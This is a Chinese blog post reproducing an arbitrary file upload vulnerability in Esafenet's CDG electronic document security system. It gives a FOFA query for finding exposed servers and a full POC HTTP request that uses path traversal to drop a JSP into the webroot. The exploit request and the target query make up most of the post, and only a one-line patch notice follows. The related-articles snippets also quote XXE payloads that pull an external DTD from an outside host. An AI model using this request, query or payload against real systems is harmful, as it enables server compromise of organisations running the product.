首页 > 其他分享 >【漏洞复现】亿赛通 电子文档安全管理系统 DecryptApplicationService2 任意文件上传漏洞

【漏洞复现】亿赛通 电子文档安全管理系统 DecryptApplicationService2 任意文件上传漏洞

时间:2023-09-20 21:47:38浏览次数:55  
标签:DecryptApplicationService2 亿赛 漏洞 文档 加密 上传

1、简介

亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业校心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

2、漏洞描述

DecryptApplicationService2 接口存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件,进而获取服务器权限。

3、受影响版本

亿赛通 电子文档安全管理系统

4、FOFA语句

app="亿赛通-电子文档安全管理系统"

5、漏洞复现


POC

POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/test111.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 100
Accept-Encoding: gzip, deflate
Connection: close

<%out.print("test1234");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>


访问上传文件

/CDGServer3/test111.jsp

6、整改建议

厂商已经发布补丁,请及时关注厂商主页更新:https://www.esafenet.com/

标签:DecryptApplicationService2,亿赛,漏洞,文档,加密,上传
From: https://www.cnblogs.com/fuchangjiang/p/17718515.html

相关文章

  • 逻辑漏洞挖掘之XSS漏洞原理分析及实战演练
    一、前言2月份的1.2亿条用户地址信息泄露再次给各大公司敲响了警钟,数据安全的重要性愈加凸显,这也更加坚定了我们推行安全测试常态化的决心。随着测试组安全测试常态化的推进,有更多的同事对逻辑漏洞产生了兴趣,本系列文章旨在揭秘逻辑漏洞的范围、原理及预防措施,逐步提升大家的安全......
  • 关于“VMware ESXi OpenSLP堆溢出漏洞”的修复说明​
    关于“VMwareESXiOpenSLP堆溢出漏洞”的修复说明前段时间IT圈被一个“ESXiArgs勒索软件攻击VMwareESXi服务器”的相关新闻刷屏。互联网上的文章称,这些攻击活动似乎利用CVE-2021-21974漏洞,由OpenSLP服务中的堆溢出问题引起,未经身份验证的威胁参与者可以利用该问题进行低复......
  • XXE漏洞
    参考链接:XXE萌新进阶全攻略未知攻焉知防——XXE漏洞攻防歪?我想要一个XXE。xxe笔记BlindXXE详解+GoogleCTF一道题目分析一、基础知识1、XMLXML即可扩展标记语言(EXtensibleMarkupLanguage),是一种标记语言,其标签没有预定义,您需要自行定义标签,是W3C的推荐标准。其于HTM......
  • Spring Framework RCE CVE-2022-22965 漏洞分析
    摘要本文会从几个角度分析漏洞CVE-2022-22965,首先会从payload的构造。每次我都喜欢先分析漏洞的payload,不得不承认实力没达到可以直接分析漏洞地步。所以会先看看payload的构造过程看看,每次学习和分析漏洞的payload能学到很多有趣的角度和想法。从payload的构造分析,分析payload的......
  • 【漏洞复现】Openfire身份认证绕过漏洞到RCE(CVE-2023-32315)
    1、简介Openfire是一个基于XMPP协议的即时通讯服务器,也称之为即时通讯平台。在即时通讯中往往因为需要保存一些状态或者数据所以不能采用点对点通讯,而是需要搭建服务器来转发。Openfire的管理页面包含5个菜单选项,分别是服务器基本信息配置选项、用户组管理选项、会话管理选项、分......
  • 【漏洞复现】紫光电子档案管理系统任意文件上传漏洞
    1、简介紫光电子档案管理系统是由紫光软件系统有限公司自主研发的通用档案管理系统,依照国家档案管理标准开发,结合先进的信息化管理理念,采用纯BS结构,使用流行的互联网云计算的技术框架,并且通过UE优化设计,符合用户的使用习惯,是一套具有先进性、安全性、前瞻性的综合档案管理平台。......
  • 【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)
    1、简介JumpServer是一款符合4A规范的开源堡垒机,帮助企业以更安全的方式管控和登录各种类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。2、漏洞描述JumpServer在3.0.0-3.6.3版本存在未授权访问漏洞。由于系统权限配置存在不合理,导致未授权攻击者可以直接访问......
  • WEB漏洞-XXE&XML之利用检测绕过全解
    XML内容: <?xmlversion="1.0"?> <!DOCTYPEa[ <!ENTITY%dSYSTEM“file:///etc/passwd”>%d; ]> <c>%d;</c> XML内容 <?xmlversion=’1.0’?> <!DOCTYPEa[ <!ENTITY%dSYSTEM“http://abc.com/evil.dt......
  • 基于Linux+宝塔面板+LNMP+Wordpress搭建的网站主页的网站漏洞修补的解决方案 (1)
    基于Linux+宝塔面板+LNMP+Wordpress搭建的网站主页1.网站漏洞修补的解决方案@目录基于Linux+宝塔面板+LNMP+Wordpress搭建的网站主页前言为什么要做网站漏洞扫描降低资产所面临的风险满足法律合规要求满足业界安全最佳实践及认证需求其他参考信息等级保护网络安全法安全建议漏......
  • 业务逻辑漏洞_支付逻辑
    ❤️支付问题的思路❤️......